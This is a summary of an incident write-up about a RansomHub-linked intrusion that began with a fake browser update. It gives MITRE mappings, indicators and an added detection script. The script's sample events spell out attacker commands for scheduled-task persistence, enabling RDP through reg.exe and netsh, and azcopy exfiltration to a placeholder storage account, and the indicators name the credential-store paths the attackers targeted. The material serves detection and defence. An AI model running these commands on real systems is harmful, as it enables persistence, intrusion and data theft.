From CPU Spikes to Defense: How Varonis Prevented a Ransomware Disaster

A user executed malicious JavaScript disguised as a browser update, which led to a multi-stage intrusion tied to RansomHub affiliates using SocGholish and resulted in rapid credential theft, privilege escalation to Domain Admin, and mass data exfiltration via AzCopy. Varonis intervened within 48 hours, containing and remediating the threat with zero business downtime. #RansomHub #SocGholish #AzCopy

Key points

  • A user downloaded and executed a malicious JavaScript disguised as a browser update, initiating the compromise.
  • Automated reconnaissance and C2 activity immediately followed, including Active Directory enumeration and credential hunting in memory.
  • Persistence was achieved via a recurring Scheduled Task and an encrypted multi-layer Python-based SOCKS proxy deployed to %LOCALAPPDATA%\ConnectedDevicesPlatform.
  • The attacker escalated to Domain Admin within ~4 hours, exploiting misconfigured AD CS certificates and abusing an ADFS account with SeTcbPrivilege on a read-only Domain Controller.
  • Attackers performed extensive discovery (network shares, browser DPAPI decryption attempts, and targeted opening of internal documentation with Office apps) and targeted domain admin laptops via RDP configuration changes.
  • Mass data exfiltration occurred ~24 hours after compromise using AzCopy; the activity caused a notable CPU spike that led to detection.
  • Varonis responded within 48 hours, identified IOCs and persistence, severed malicious access, and remediated the environment with no business downtime.

MITRE Techniques

  • [T1204] User Execution – Malicious JavaScript executed after a user downloaded a file presented as a legitimate browser update: “user downloaded and subsequently executed a file that they were led to believe was a legitimate browser update.”
  • [T1086] PowerShell – Credential hunting and local system queries, including DPAPI decryption attempts against browser stores, imply that scripting was used for credential theft: “attempts to use Data Protection API (DPAPI) to decrypt passwords stored in the browsers from files.”
  • [T1053] Scheduled Task/Job – Second-stage malware deployed as a recurring Scheduled Task for persistence: “second-stage malware was deployed as a recurring Scheduled Task for persistence.”
  • [T1090] Proxy – Deployment of an encrypted Python script serving as a SOCKS proxy to pivot attacker infrastructure through the host: “an encrypted Python script that served as a SOCKS proxy with attacker infrastructure, exposing the corporate network directly over the Internet.”
  • [T1027] Obfuscated Files or Information – Multi-layered encryption/unpacking routine (10 layers) with randomized variable names and anti-analysis checks to hinder unpacking and analysis: “10 layers of multi-stage encryption…randomized variable names…VM detection, Debug detection, and Process Tracing detection.”
  • [T1003] OS Credential Dumping – Hunting for credentials in memory and searching for credential-containing files (OVPN, KeePass, etc.) and browser login databases: “hunting for credentials in memory…OVPN files, KeePass Vaults…Local State…Login Data.”
  • [T1136] Create Account / [T1137] Office Application Startup – Abusing accounts and Office applications to access internal documentation (using Word/Visio/Excel to open files of interest) to gather architectural information: “used installed copies of Word, Visio, and Excel to open specific files of interest about the internal architecture.”
  • [T1078] Valid Accounts – Use and abuse of ADFS and Domain Admin accounts with elevated tokens and SeTcbPrivilege to impersonate and escalate privileges: “ADFS account was observed authenticating…where it subsequently had administrative privileges…SeTcbPrivilege…allows the grantee to impersonate any other user.”
  • [T1550] Use of Alternate Authentication Material – Manipulation of email signatures to embed malicious image references to coerce NTLM authentication and harvest credentials: “manipulating all email signatures…embedding a malicious image reference…used on vulnerable clients to coerce an NTLM authentication attempt.”
  • [T1041] Exfiltration Over C2 Channel / [T1537] Transfer Data to Cloud Account – Use of AzCopy to transfer large volumes of data to external Azure Storage accounts for exfiltration: “the threat deployed AzCopy…used this to achieve mass data exfiltration across a few targeted directories.”
  • [T1569] System Services – Use of reg.exe, netsh.exe, and registry edits to enable RDP and open port 3389 for lateral access: “abused reg.exe and netsh.exe to configure appropriate registry settings to allow remote connections and ensure that port 3389 was open.”

Indicators of Compromise

  • [File Name] Malicious payloads and tools – examples: encrypted Python script in %LOCALAPPDATA%\ConnectedDevicesPlatform, and a legitimate Python distribution placed in the same ConnectedDevicesPlatform directory.
  • [Scheduled Task] Persistence – a recurring Scheduled Task created to execute the second-stage malware (specific task name not published).
  • [Tool] Data transfer utility – AzCopy used for exfiltration – example: AzCopy execution targeting Azure Storage Accounts.
  • [Registry/Service Changes] RDP enablement – registry modifications and use of netsh/reg.exe to open port 3389 and allow remote connections on targeted laptops.
  • [Email Artifact] Modified signature references – $env:APPDATA\Microsoft\Signatures manipulated to include malicious image references for NTLM coercion.
  • [Credential Stores] Browser and vault locations targeted – examples: Chrome/Edge Login Data and Local State paths ($env:LOCALAPPDATA\(Google|Microsoft)\(Chrome|Edge)\User Data\Default\Login Data and Local State), OVPN files, and KeePass vaults.
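As an added hunting example (this is not Varonis code and not from the original write-up), the script below runs the indicators listed above as detection rules over constructed Sysmon-style process-creation events and then correlates hits per host. The hostnames, usernames, the task name "ConnectedDevicesSync", the storage-account name and the event line format are all hypothetical; only the indicator categories (Scheduled Task and Python interpreter under %LOCALAPPDATA%\ConnectedDevicesPlatform, reg.exe/netsh.exe enabling RDP on 3389, AzCopy to an Azure Storage account) come from the page.

```python
"""Hunt constructed process-creation events for the indicator chain from the write-up.

Added example, not Varonis code. Hosts, users, task name and storage-account
name are hypothetical; only the indicator categories come from the write-up.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Constructed Sysmon-style process-creation events, one per line (hypothetical data).
SAMPLE_EVENTS = [
    r'host=WS-0142 user=CORP\jdoe image=C:\Windows\System32\schtasks.exe cmdline=schtasks.exe /Create /SC MINUTE /MO 30 /TN "ConnectedDevicesSync" /TR "C:\Users\jdoe\AppData\Local\ConnectedDevicesPlatform\python.exe C:\Users\jdoe\AppData\Local\ConnectedDevicesPlatform\proxy.py"',
    r'host=WS-0142 user=CORP\jdoe image=C:\Users\jdoe\AppData\Local\ConnectedDevicesPlatform\python.exe cmdline=python.exe proxy.py',
    r'host=LT-ADM01 user=CORP\adm.smith image=C:\Windows\System32\reg.exe cmdline=reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'host=LT-ADM01 user=CORP\adm.smith image=C:\Windows\System32\netsh.exe cmdline=netsh.exe advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow',
    r'host=FS-01 user=CORP\svc-adfs image=C:\Tools\azcopy.exe cmdline=azcopy.exe copy "D:\Shares\Engineering" "https://examplestorage.blob.core.windows.net/backup?sv=2021" --recursive',
    r'host=WS-0142 user=CORP\jdoe image=C:\Windows\System32\notepad.exe cmdline=notepad.exe readme.txt',
    r'host=WS-0201 user=CORP\asmith image=C:\Program Files\Python311\python.exe cmdline=python.exe build.py',
]

EVENT_RX = re.compile(r'^host=(\S+) user=(\S+) image=(.+?) cmdline=(.*)$')


def parse_event(line: str) -> Optional[dict]:
    """Split one flattened event into its fields; None if the line is not an event."""
    m = EVENT_RX.match(line)
    if not m:
        return None
    host, user, image, cmdline = m.groups()
    return {"host": host, "user": user, "image": image, "cmdline": cmdline}


def _image_is(event: dict, exe: str) -> bool:
    return event["image"].lower().endswith("\\" + exe)


def _cmd_has(event: dict, pattern: str) -> bool:
    return re.search(pattern, event["cmdline"], re.IGNORECASE) is not None


# Each rule maps one indicator from the write-up to a predicate over a parsed event.
RULES = {
    # Persistence: a Scheduled Task whose action runs out of %LOCALAPPDATA%\ConnectedDevicesPlatform.
    "task_runs_from_connecteddevicesplatform": lambda e: (
        _image_is(e, "schtasks.exe") and _cmd_has(e, r'appdata\\local\\connecteddevicesplatform\\')),
    # Staged interpreter: a Python binary executing from that user-writable directory
    # (where the write-up's SOCKS proxy lived); a Program Files install never matches.
    "python_from_connecteddevicesplatform": lambda e: re.search(
        r'appdata\\local\\connecteddevicesplatform\\.*python[^\\]*\.exe$', e["image"], re.I) is not None,
    # RDP enablement via reg.exe: fDenyTSConnections set to 0.
    "reg_enables_rdp": lambda e: (
        _image_is(e, "reg.exe") and _cmd_has(e, r'fDenyTSConnections.*/d\s*0\b')),
    # RDP enablement via netsh: inbound allow rule for TCP 3389.
    "netsh_opens_3389": lambda e: (
        _image_is(e, "netsh.exe") and _cmd_has(e, r'localport=3389\b.*action=allow')),
    # Exfiltration: AzCopy copying to an Azure Storage account endpoint.
    "azcopy_to_azure_storage": lambda e: (
        _image_is(e, "azcopy.exe") and _cmd_has(e, r'https://[^\s"]+\.blob\.core\.windows\.net')),
}


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    cmdline: str


def scan(lines) -> list:
    """Run every rule over every event; one Finding per (event, rule) hit."""
    findings = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        for name, predicate in RULES.items():
            if predicate(event):
                findings.append(Finding(event["host"], event["user"], name, event["cmdline"]))
    return findings


def hosts_with_multiple_indicators(findings, threshold: int = 2) -> dict:
    """Correlate per host: two or more distinct indicators on one machine (task plus
    staged interpreter, or reg plus netsh) is the pattern worth escalating first."""
    per_host = defaultdict(set)
    for f in findings:
        per_host[f.host].add(f.rule)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= threshold}


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.host:<9} {f.user:<16} {f.rule}")
    print("escalate:", hosts_with_multiple_indicators(hits))
```

On the constructed input the single AzCopy hit on FS-01 stays below the correlation threshold, which is deliberate: AzCopy is a legitimate tool, so that finding should be triaged against the volume and destination (the CPU spike that surfaced the real incident is a useful secondary signal), while the two-indicator hosts go to the top of the queue.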

Read more: https://www.varonis.com/blog/varonis-prevents-ransomware-disaster